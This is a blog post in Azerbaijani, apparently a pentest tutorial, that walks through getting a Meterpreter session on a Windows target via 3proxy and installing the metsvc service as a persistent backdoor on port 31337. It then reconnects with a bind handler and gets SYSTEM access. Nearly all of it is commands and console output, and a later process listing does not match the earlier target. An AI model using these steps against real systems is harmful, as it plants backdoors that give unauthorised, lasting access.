Blackhat.az

Loading...

Blackhat.az

Register

Metasploit - 22 February 2021

MSF Meterpreter Backdoor

Meterpreter metsvc

Hədəf sisteminə daxil olduqdan sonra qaliciliqi qorumağın bir yolu metsvcxidmətindən istifadə etməkdir. Bu xidmətlə istədiyiniz zaman Meterpreter-ə yenidən daxil ola bilərsiniz. Metsvc haqqında ətraflı məlumatı keçiddən istifadə edərək görə bilərsiniz.

Metsvc haqqında bilməli olduğunuz vacib bir məqamı vurğulayaq. Bu xidməti yerləşdirdiyiniz kompüterin uyğun portunu tapan hər kəs bu arxa qapıdan istifadə edə bilər. Pentest prosesi zamanı istifadə etdikdən sonra ləğv etməlisiniz, əks halda sistemi zərərli insanlar üçün açıq hala gətirəcəksiniz. Sistem sahibləri bunu qətiyyən bəyənməyə bilər.

Əvvəlcə sistemdəki əlaqəli modulu istifadə edərək bir sessiya açaq.

msf exploit(3proxy) > exploit

[*] Started reverse handler
[*] Trying target Windows XP SP2 - English...
[*] Sending stage (719360 bytes)
[*] Meterpreter session 1 opened (192.168.1.101:4444 -> 192.168.1.104:1983)

psExplorer.exe

Proqramın PID nömrəsi ilə əmr verin və migrate PID proqram nömrəsi əmrini ötürək.

meterpreter > ps

Process list
============

  PID  Name         Path
  ---  ----         ----
  132  ctfmon.exe      C:\WINDOWS\system32\ctfmon.exe
  176  svchost.exe     C:\WINDOWS\system32\svchost.exe
  440  VMwareService.exe  C:\Program Files\VMware\VMware Tools\VMwareService.exe
  632  Explorer.EXE     C:\WINDOWS\Explorer.EXE
  796  smss.exe       \SystemRoot\System32\smss.exe
  836  VMwareTray.exe    C:\Program Files\VMware\VMware Tools\VMwareTray.exe
  844  VMwareUser.exe    C:\Program Files\VMware\VMware Tools\VMwareUser.exe
  884  csrss.exe      \??\C:\WINDOWS\system32\csrss.exe
  908  winlogon.exe     \??\C:\WINDOWS\system32\winlogon.exe
  952  services.exe     C:\WINDOWS\system32\services.exe
  964  lsass.exe      C:\WINDOWS\system32\lsass.exe
  1120 vmacthlp.exe     C:\Program Files\VMware\VMware Tools\vmacthlp.exe
  1136 svchost.exe     C:\WINDOWS\system32\svchost.exe
  1236 svchost.exe     C:\WINDOWS\system32\svchost.exe
  1560 alg.exe       C:\WINDOWS\System32\alg.exe
  1568 WZCSLDR2.exe     C:\Program Files\ANI\ANIWZCS2 Service\WZCSLDR2.exe
  1596 jusched.exe     C:\Program Files\Java\jre6\bin\jusched.exe
  1656 msmsgs.exe      C:\Program Files\Messenger\msmsgs.exe
  1748 spoolsv.exe     C:\WINDOWS\system32\spoolsv.exe
  1928 jqs.exe       C:\Program Files\Java\jre6\bin\jqs.exe
  2028 snmp.exe       C:\WINDOWS\System32\snmp.exe
  2840 3proxy.exe      C:\3proxy\bin\3proxy.exe
  3000 mmc.exe       C:\WINDOWS\system32\mmc.exe

meterpreter > migrate 632
[*] Migrating to 632...
[*] Migration completed successfully.

metsvc Modulu istifadə etməzdən əvvəl köməyə baxaq və bizə hansı imkanlar verdiyini görək.

meterpreter > run metsvc -h
[*]
OPTIONS:

  -A    Automatically start a matching multi/handler to connect to the service
  -h    This help menu
  -r    Uninstall an existing Meterpreter service (files must be deleted manually)

meterpreter >

metsvcNormalda, bu da bizə geri bağlantılar təmin edən bir proqramdır, lakin Meterpreter-də artıq daxil olduğumuz üçün hələlik geri əlaqələrə ehtiyacımız yoxdur. Gəlin yalnız proqramı işə salaq.

meterpreter > run metsvc
[*] Creating a meterpreter service on port 31337
[*] Creating a temporary installation directory C:\DOCUME~1\victim\LOCALS~1\Temp\JplTpVnksh...
[*] >> Uploading metsrv.dll...
[*] >> Uploading metsvc-server.exe...
[*] >> Uploading metsvc.exe...
[*] Starting the service...
[*]   * Installing service metsvc
 * Starting service
Service metsvc successfully installed.

meterpreter >

metsvc başladı və indi qoşulmağı gözləyir. Gəlin bu xidmətlə necə əlaqə quracağımızı görək.

Hədəf sistemindəki dinləmə vəziyyəti metsvcilə əlaqə qurmaq windows/metsvc_bind_tcpüçün faydalı yük modulundan istifadə edəcəyik. Aşağıdakı nümunədəki kimi modulu aktivləşdirək və lazımi PORT parametrlərini edək.

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/metsvc_bind_tcp
PAYLOAD => windows/metsvc_bind_tcp
msf exploit(handler) > set LPORT 31337
LPORT => 31337
msf exploit(handler) > set RHOST 192.168.1.104
RHOST => 192.168.1.104
msf exploit(handler) > show options

Module options:

  Name Current Setting Required Description
  ---- --------------- -------- -----------


Payload options (windows/metsvc_bind_tcp):

  Name   Current Setting Required Description
  ----   --------------- -------- -----------
  EXITFUNC thread      yes Exit technique: seh, thread, process
  LPORT   31337      yes The local port
  RHOST   192.168.1.104  no    The target address


Exploit target:

  Id Name
  -- ----
  0  Wildcard Target


msf exploit(handler) > exploit

[*] Starting the payload handler...
[*] Started bind handler
[*] Meterpreter session 2 opened (192.168.1.101:60840 -> 192.168.1.104:31337)

Gördüyünüz kimi session 2avtomatik açıldı. İndi metsvcxidmətin hədəf kompüterdə hansı PID nömrəsini işlədiyini görək.

meterpreter > ps

Process list
============

  PID  Name        Path                         
  ---  ----        ----                         
  140  smss.exe      \SystemRoot\System32\smss.exe             
  168  csrss.exe     \??\C:\WINNT\system32\csrss.exe            
  188  winlogon.exe    \??\C:WINNT\system32\winlogon.exe          
  216  services.exe    C:\WINNT\system32\services.exe            
  228  lsass.exe     C:\WINNT\system32\lsass.exe              
  380  svchost.exe    C:\WINNT\system32\svchost.exe             
  408  spoolsv.exe    C:\WINNT\system32\spoolsv.exe             
  444  svchost.exe    C:\WINNT\System32\svchost.exe             
  480  regsvc.exe     C:\WINNT\system32\regsvc.exe             
  500  MSTask.exe     C:\WINNT\system32\MSTask.exe             
  528  VMwareService.exe C:\Program Files\VMware\VMware Tools\VMwareService.exe
  564  metsvc.exe     c:\WINNT\my\metsvc.exe                
  588  WinMgmt.exe    C:\WINNT\System32\WBEM\WinMgmt.exe          
  676  cmd.exe      C:\WINNT\System32\cmd.exe               
  724  cmd.exe      C:\WINNT\System32\cmd.exe               
  764  mmc.exe      C:\WINNT\system32\mmc.exe               
  816  metsvc-server.exe c:\WINNT\my\metsvc-server.exe             
  888  VMwareTray.exe   C:\Program Files\VMware\VMware Tools\VMwareTray.exe  
  896  VMwareUser.exe   C:\Program Files\VMware\VMware Tools\VMwareUser.exe  
  940  firefox.exe    C:\Program Files\Mozilla Firefox\firefox.exe     
  972  TPAutoConnSvc.exe C:\Program Files\VMware\VMware Tools\TPAutoConnSvc.exe
  1000 Explorer.exe    C:\WINNT\Explorer.exe                 
  1088 TPAutoConnect.exe C:\Program Files\VMware\VMware Tools\TPAutoConnect.exe

meterpreter > pwd C:\WINDOWS\system32
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

Çıxışdan göründüyü kimi, metsvcproqram 564 PID nömrəsi ilə işləyir. Artıq istədiyiniz vaxt windows/metsvc_bind_tcpyükləmə modulundan istifadə edərək hədəf kompüterdə dinləyən proqrama qoşula bilərik .

Yenidən xatırlatmaq üçün, təhlükəsizlik testi bitdikdən metsvcsonra proqramı sistemdən silməlisiniz.


Fatal error: Uncaught Error: Call to a member function listFiles() on null in /home/bht/public_html/wp-content/plugins/w3-total-cache/CdnEngine_GoogleDrive.php:595 Stack trace: #0 /home/bht/public_html/wp-content/plugins/w3-total-cache/CdnEngine_GoogleDrive.php(615): W3TC\CdnEngine_GoogleDrive->path_get_id() #1 /home/bht/public_html/wp-content/plugins/w3-total-cache/Cdn_Core.php(738): W3TC\CdnEngine_GoogleDrive->format_url() #2 /home/bht/public_html/wp-content/plugins/w3-total-cache/Cdn_Plugin.php(1232): W3TC\Cdn_Core->url_to_cdn_url() #3 /home/bht/public_html/wp-content/plugins/w3-total-cache/Cdn_Plugin.php(915): W3TC\_Cdn_Plugin_ContentFilter->_link_replace_callback_ask_cdn() #4 [internal function]: W3TC\_Cdn_Plugin_ContentFilter->_link_replace_callback() #5 /home/bht/public_html/wp-content/plugins/w3-total-cache/Cdn_Plugin.php(939): preg_replace_callback() #6 [internal function]: W3TC\_Cdn_Plugin_ContentFilter->_srcset_replace_callback() #7 /home/bht/public_html/wp-content/plugins/w3-total-cache/Cdn_Plugin.php(868): pr in /home/bht/public_html/wp-content/plugins/w3-total-cache/CdnEngine_GoogleDrive.php on line 595